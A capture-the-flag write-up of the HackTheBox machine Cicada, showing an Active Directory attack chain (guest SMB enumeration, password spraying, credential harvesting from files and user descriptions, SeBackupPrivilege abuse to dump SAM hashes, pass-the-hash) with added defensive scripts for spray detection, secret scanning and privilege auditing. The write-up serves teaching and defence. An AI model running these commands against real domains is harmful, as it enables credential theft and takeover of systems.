
HackTheBox - Cicada


Cicada is a beginner-to-intermediate Windows machine that focuses on foundational Active Directory enumeration and exploitation techniques. Throughout the engagement, I enumerated the domain to identify user accounts, explored accessible network shares, uncovered plaintext credentials stored within files, performed a password spraying attack, and finally leveraged the SeBackupPrivilege to escalate privileges and fully compromise the system.

Port Scan

We start off with an nmap scan:

nmap -sC -sV 10.129.66.140 -o nmap/nmapscan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-06 16:26:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Judging from the open ports, this is a Windows Domain Controller, so we add the machine name cicada.htb to our /etc/hosts.
There is no web server, so we start with SMB.

smb Enumeration

We check whether null authentication works, using NetExec.

  • NetExec (nxc) is a network service exploitation tool that helps automate assessing the security of networks.
nxc smb cicada.htb -u '.' -p ''

SMB         10.129.66.140   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.66.140   445    CICADA-DC        [+] cicada.htb\.: (Guest)

We can authenticate as Guest without a password, so let's list the shares.

nxc smb cicada.htb -u '.' -p '' --shares

SMB         10.129.66.140   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.66.140   445    CICADA-DC        [+] cicada.htb\.: (Guest)
SMB         10.129.66.140   445    CICADA-DC        [*] Enumerated shares
SMB         10.129.66.140   445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.66.140   445    CICADA-DC        -----           -----------     ------
SMB         10.129.66.140   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.66.140   445    CICADA-DC        C$                              Default share
SMB         10.129.66.140   445    CICADA-DC        DEV                             
SMB         10.129.66.140   445    CICADA-DC        HR              READ            
SMB         10.129.66.140   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.66.140   445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.66.140   445    CICADA-DC        SYSVOL                          Logon server share 

We have read access to HR, so we use smbclient to browse the share.

smbclient //10.129.66.140/HR -U guest

Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 15:29:09 2024
  ..                                  D        0  Thu Mar 14 15:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 20:31:48 2024

		4168447 blocks of size 4096. 481853 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> exit

There is a note from HR; we download it and read its contents.

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, dont hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

The note advises the new hire to change their default password after logging in, and it discloses that password.

  • Default password: Cicada$M6Corpb*@Lp#nZp!8

Now that we have a password we can do a password spray, but we need a list of user names.
To get the users on the machine we use NetExec's --rid-brute flag, which enumerates accounts by brute-forcing RIDs.

# since the list is big we redirect the output to a file
nxc smb cicada.htb -u '.' -p '' --rid-brute > userslist.txt 

# to filter the list (SidTypeUser entries only, account name without the domain prefix) we use awk
awk -F : '{ print $2 }' userslist.txt | grep 'SidTypeUser' | awk -F '\' '{ print $2 }' | awk -F ' ' '{ print $1 }' > users.txt

# here is the users list; we can go further and delete the first 3 since they are default accounts
cat users.txt 
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
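
The awk pipeline above works, but it depends on column positions and on `awk -F '\'`, which GNU awk warns about. As an added example (not code from the writeup), here is the same filtering done in Python over constructed sample lines in the format nxc's `--rid-brute` output uses, `<rid>: <DOMAIN>\<name> (<SidType>)` after the host columns. It also drops the three built-in accounts the writeup says to remove, plus the machine account (trailing `$`), which is not a human account. The sample lines and the `BUILTIN` set are assumptions made for this example.

```python
import re

# Constructed sample of `nxc smb ... --rid-brute` output (not the writeup's real file).
# Group entries and the banner lines are included so the filter has something to skip.
SAMPLE_RID_BRUTE = """\
SMB         10.129.66.140   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.66.140   445    CICADA-DC        [+] cicada.htb\\.: (Guest)
SMB         10.129.66.140   445    CICADA-DC        498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.66.140   445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.129.66.140   445    CICADA-DC        501: CICADA\\Guest (SidTypeUser)
SMB         10.129.66.140   445    CICADA-DC        502: CICADA\\krbtgt (SidTypeUser)
SMB         10.129.66.140   445    CICADA-DC        512: CICADA\\Domain Admins (SidTypeGroup)
SMB         10.129.66.140   445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.129.66.140   445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
SMB         10.129.66.140   445    CICADA-DC        1105: CICADA\\sarah.dantelia (SidTypeUser)
"""

# One RID entry: "<rid>: <DOMAIN>\<name> (<SidType>)". Names may contain spaces
# ("Domain Admins"), so the name group is lazy and terminated by the SidType suffix.
RID_RE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<sidtype>SidType\w+)\)\s*$"
)

# Default accounts the writeup says to drop from the list (assumption: these three only).
BUILTIN = {"Administrator", "Guest", "krbtgt"}


def parse_rid_brute(text):
    """Return (rid, name, sidtype) tuples for every RID entry; banner lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = RID_RE.search(line)
        if m:
            entries.append((int(m["rid"]), m["name"], m["sidtype"]))
    return entries


def user_accounts(text, drop_builtin=True, drop_machine=True):
    """Account names of SidTypeUser entries, optionally minus built-ins and machine accounts."""
    names = []
    for _rid, name, sidtype in parse_rid_brute(text):
        if sidtype != "SidTypeUser":
            continue                      # groups, aliases, etc.
        if drop_builtin and name in BUILTIN:
            continue
        if drop_machine and name.endswith("$"):
            continue                      # computer account with a machine-generated password
        names.append(name)
    return names


if __name__ == "__main__":
    print("\n".join(user_accounts(SAMPLE_RID_BRUTE)))
```

Run it as a script to get the same `users.txt` content as the awk pipeline, minus the default and machine accounts.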

With the user list, we do the password spray:

nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

SMB         10.129.66.140   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.66.140   445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.66.140   445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.66.140   445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.66.140   445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.66.140   445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.66.140   445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.66.140   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

We get a success for michael.wrightson, which means he never changed the default password.
We now list the shares as michael.wrightson.
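
From the defender's side, this spray shows up on the DC as a burst of failed logons from one source against many different accounts, each tried once, so a per-account lockout threshold never fires. The signal is the number of distinct target accounts per source inside a short window. The following is an added example, not part of the writeup: it runs that check over constructed records carrying the fields a Security log 4625 event has (TimeCreated, TargetUserName, IpAddress, Status). The source addresses, the benign second block and the window/threshold values are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

STATUS_LOGON_FAILURE = "0xC000006D"   # NTSTATUS behind the STATUS_LOGON_FAILURE nxc prints

# Constructed failed-logon records: (TimeCreated, TargetUserName, IpAddress, Status).
# The first block mirrors the spray above as the DC would see it (michael.wrightson is
# absent because his logon succeeded). Source IPs are made up for this example.
FAILED_LOGONS = [
    ("2025-02-06T16:30:01", "Administrator",  "10.10.14.5", STATUS_LOGON_FAILURE),
    ("2025-02-06T16:30:02", "Guest",          "10.10.14.5", STATUS_LOGON_FAILURE),
    ("2025-02-06T16:30:03", "krbtgt",         "10.10.14.5", STATUS_LOGON_FAILURE),
    ("2025-02-06T16:30:04", "CICADA-DC$",     "10.10.14.5", STATUS_LOGON_FAILURE),
    ("2025-02-06T16:30:05", "john.smoulder",  "10.10.14.5", STATUS_LOGON_FAILURE),
    ("2025-02-06T16:30:06", "sarah.dantelia", "10.10.14.5", STATUS_LOGON_FAILURE),
    # One user mistyping her own password three times is not a spray.
    ("2025-02-06T09:12:10", "sarah.dantelia", "10.10.20.9", STATUS_LOGON_FAILURE),
    ("2025-02-06T09:12:40", "sarah.dantelia", "10.10.20.9", STATUS_LOGON_FAILURE),
    ("2025-02-06T09:13:05", "sarah.dantelia", "10.10.20.9", STATUS_LOGON_FAILURE),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Map source IP -> sorted distinct accounts for every source that produced failed
    logons against at least `min_accounts` distinct accounts within any `window`."""
    by_src = defaultdict(list)
    for ts, user, ip, status in events:
        if status != STATUS_LOGON_FAILURE:
            continue
        by_src[ip].append((datetime.fromisoformat(ts), user.lower()))

    flagged = {}
    for ip, rows in by_src.items():
        rows.sort()                       # sliding window needs chronological order
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            distinct = {user for _, user in rows[start:end + 1]}
            if len(distinct) >= min_accounts:
                flagged[ip] = sorted({user for _, user in rows})
                break
    return flagged


if __name__ == "__main__":
    for ip, accounts in detect_spray(FAILED_LOGONS).items():
        print(f"possible password spray from {ip}: {len(accounts)} accounts -> {accounts}")
```

Tune `window` and `min_accounts` to the environment; a "slow" spray spreads attempts over hours to stay under both, so a longer window with a higher threshold is a useful second rule alongside this one.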

nxc smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB         10.129.66.140   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.66.140   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.66.140   445    CICADA-DC        [*] Enumerated shares
SMB         10.129.66.140   445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.66.140   445    CICADA-DC        -----           -----------     ------
SMB         10.129.66.140   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.66.140   445    CICADA-DC        C$                              Default share
SMB         10.129.66.140   445    CICADA-DC        DEV                             
SMB         10.129.66.140   445    CICADA-DC        HR              READ            
SMB         10.129.66.140   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.66.140   445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.66.140   445    CICADA-DC        SYSVOL          READ            Logon server share 

Enumerating the user descriptions over LDAP reveals a user who left sensitive information in his description field; reading descriptions is a standard step of the enumeration process.

nxc ldap cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M user-desc
SMB         10.129.66.140   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.129.66.140   389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
USER-DESC   10.129.66.140   389    CICADA-DC        User: krbtgt - Description: Key Distribution Center Service Account
USER-DESC   10.129.66.140   389    CICADA-DC        User: david.orelious - Description: Just in case I forget my password is aRt$Lp#7t*VQ!3
USER-DESC   10.129.66.140   389    CICADA-DC        Saved 4 user descriptions to .../.nxc/logs/UserDesc-10.129.66.140-20250206_132327.log

cat /.nxc/logs/UserDesc-10.129.66.140-20250206_132327.log
User:                     Description:
Administrator             Built-in account for administering the computer/domain
Guest                     Built-in account for guest access to the computer/domain
krbtgt                    Key Distribution Center Service Account
david.orelious            Just in case I forget my password is aRt$Lp#7t*VQ!3

The user david.orelious exposed his password, aRt$Lp#7t*VQ!3, in his description.
We list the shares this user has access to:

 nxc smb cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.129.66.140   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.66.140   445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.129.66.140   445    CICADA-DC        [*] Enumerated shares
SMB         10.129.66.140   445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.66.140   445    CICADA-DC        -----           -----------     ------
SMB         10.129.66.140   445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.66.140   445    CICADA-DC        C$                              Default share
SMB         10.129.66.140   445    CICADA-DC        DEV             READ            
SMB         10.129.66.140   445    CICADA-DC        HR              READ            
SMB         10.129.66.140   445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.66.140   445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.129.66.140   445    CICADA-DC        SYSVOL          READ            Logon ser

This user has read access to DEV, so we browse it:

smbclient //10.129.66.140/DEV -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 15:31:39 2024
  ..                                  D        0  Thu Mar 14 15:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 20:28:22 2024

		4168447 blocks of size 4096. 478133 blocks available
smb: \> get  "Backup_script.ps1"
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> 

We get a PowerShell script:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

The script hardcodes a user's credentials in plain text:

  • username : emily.oscars
  • password : Q!3@Lp#M6b*7t*Vt
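
Three of the four credentials on this box were found in free text: the HR notice, an AD user description and a script on a share. A periodic scan of those places is a cheap control. The following is an added example, not code from the writeup or from any tool it uses: a small scanner with two rules, one for "password is ..." prose and one for PowerShell's `ConvertTo-SecureString "..." -AsPlainText`, run over the relevant lines of the three artefacts above (reproduced here as constructed inputs). The rule names and the `looks_like_secret` heuristic are assumptions made for the example; the heuristic exists so that the HR note's "your password is a crucial aspect" is not reported.

```python
import re

# Constructed inputs: the relevant lines of the three artefacts found on the box.
HR_NOTICE = """\
Welcome to Cicada Corp! As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Remember, your password is a crucial aspect of keeping your account secure.
"""

USER_DESC_LOG = """\
User:                     Description:
Administrator             Built-in account for administering the computer/domain
krbtgt                    Key Distribution Center Service Account
david.orelious            Just in case I forget my password is aRt$Lp#7t*VQ!3
"""

BACKUP_SCRIPT = """\
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
"""

# Detection rules written for this example (hypothetical names, not a tool's ruleset).
RULES = [
    ("password-in-prose", re.compile(r"\bpassword\s+is\s*:?\s*(\S+)", re.I)),
    ("powershell-plaintext-secret",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
]


def looks_like_secret(token):
    """Cheap filter against prose false positives ("password is a crucial ..."):
    at least 8 characters and at least one digit or symbol."""
    return len(token) >= 8 and any(not c.isalpha() for c in token)


def mask(secret):
    """Never write the recovered secret itself into a report; keep two characters."""
    return secret[:2] + "*" * (len(secret) - 2)


def scan_text(source, text):
    """Apply every rule to every line; return one finding per (line, rule) hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern in RULES:
            m = pattern.search(line)
            if m and looks_like_secret(m.group(1)):
                findings.append({"source": source, "line": lineno,
                                 "rule": rule, "masked": mask(m.group(1))})
    return findings


def scan_user_desc_log(text):
    """Body lines of the UserDesc log are '<sAMAccountName> <spaces> <description>'."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("User:"):
            continue                      # blank line or header row
        user, _, description = line.partition(" ")
        findings += scan_text(f"ad-description:{user}", description.strip())
    return findings


def scan_all():
    return (scan_text("hr-notice", HR_NOTICE)
            + scan_user_desc_log(USER_DESC_LOG)
            + scan_text("Backup_script.ps1", BACKUP_SCRIPT))


if __name__ == "__main__":
    for f in scan_all():
        print(f"{f['source']}:{f['line']} [{f['rule']}] {f['masked']}")
```

The description rule is the one worth scheduling: every domain user can read every other user's `description` attribute, so anything placed there is effectively public inside the domain. For scripts, the fix is a credential store or a group Managed Service Account rather than a literal in the file.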

Having already looked at the two non-default shares, we try WinRM (port 5985 is open) with the new credentials.

 nxc winrm cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM       10.129.66.140   5985   CICADA-DC        [*] Windows Server 2022 
WINRM       10.129.66.140   5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)

We get a shell using evil-winrm:

evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami 
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> 

Privilege Escalation

With a shell, we enumerate the user's privileges:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

SeBackupPrivilege is enabled for this user; she is a member of BUILTIN\Backup Operators, which grants it.

  • The SeBackupPrivilege is a Windows privilege that provides a user or process with the ability to read files and directories, regardless of the security settings on those objects. This privilege can be used by certain backup programs or processes that require the capability to back up or copy files that would not normally be accessible to the user.

  • However, if this privilege is not properly managed or if it is granted to unauthorized users or processes, it can lead to a privilege escalation vulnerability. The SeBackupPrivilege vulnerability can be exploited by malicious actors to gain unauthorized access to sensitive files and data on a system.
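
The `whoami /all` output above is exactly the input an auditor wants to check on every account with remote access: which well-known groups and which high-impact privileges does it hold? The following is an added example, not code from the writeup: it parses the group and privilege tables of `whoami /all` (the sample is the relevant part of the output above, reproduced as a constructed string) and reports members of the operator groups and holders of privileges that allow reading, writing or impersonating beyond the account's own ACLs. The group SIDs are the well-known BUILTIN aliases; which privileges count as high-impact is this example's own choice.

```python
import re

# Constructed sample: the group and privilege sections of the `whoami /all` output above.
WHOAMI_ALL = """\
GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Well-known BUILTIN aliases whose members can read or alter protected data.
HIGH_IMPACT_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}

# Privileges that bypass object ACLs or allow token manipulation (example's selection).
HIGH_IMPACT_PRIVS = {
    "SeBackupPrivilege", "SeRestorePrivilege", "SeDebugPrivilege",
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}

# Group rows: name (may contain single spaces), >=2 spaces, type, SID. Privilege rows:
# name, description, state. Neither header row contains an "S-1-" SID or a SeXxxPrivilege.
GROUP_RE = re.compile(r"^(?P<name>\S.*?)\s{2,}(?P<type>.+?)\s+(?P<sid>S-1-[0-9-]+)")
PRIV_RE = re.compile(r"^(?P<priv>Se\w+Privilege)\s+.+?\s+(?P<state>Enabled|Disabled)\s*$")


def parse_whoami(text):
    """Return ({sid: group_name}, {privilege: state}) from `whoami /all` output."""
    groups, privs = {}, {}
    for line in text.splitlines():
        m = GROUP_RE.match(line)
        if m:
            groups[m["sid"]] = m["name"]
            continue
        m = PRIV_RE.match(line)
        if m:
            privs[m["priv"]] = m["state"]
    return groups, privs


def audit(text):
    """High-impact group memberships and enabled high-impact privileges of the token."""
    groups, privs = parse_whoami(text)
    return {
        "groups": sorted(HIGH_IMPACT_GROUP_SIDS[s] for s in groups if s in HIGH_IMPACT_GROUP_SIDS),
        "privileges": sorted(p for p, state in privs.items()
                             if p in HIGH_IMPACT_PRIVS and state == "Enabled"),
    }


if __name__ == "__main__":
    print(audit(WHOAMI_ALL))
```

For this token the report is Backup Operators plus SeBackupPrivilege and SeRestorePrivilege; on a domain controller that combination is equivalent to full control of the machine, so a user who only needs WinRM for day-to-day work should not hold it.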

We use the privilege to read files that are normally protected, in this case the SAM and SYSTEM registry hives.

1) Create a temp directory:

mkdir C:\temp

2) Save the SAM and SYSTEM hives from HKLM to C:\temp, then download them:

reg save hklm\sam C:\temp\sam.hive

and

reg save hklm\system C:\temp\system.hive

3) Use impacket-secretsdump on the two hives to obtain the NTLM hashes:

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 

Now we can use evil-winrm to pass the hash and connect as the local Administrator:

evil-winrm -i cicada.htb -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

This post is licensed under CC BY 4.0 by the author.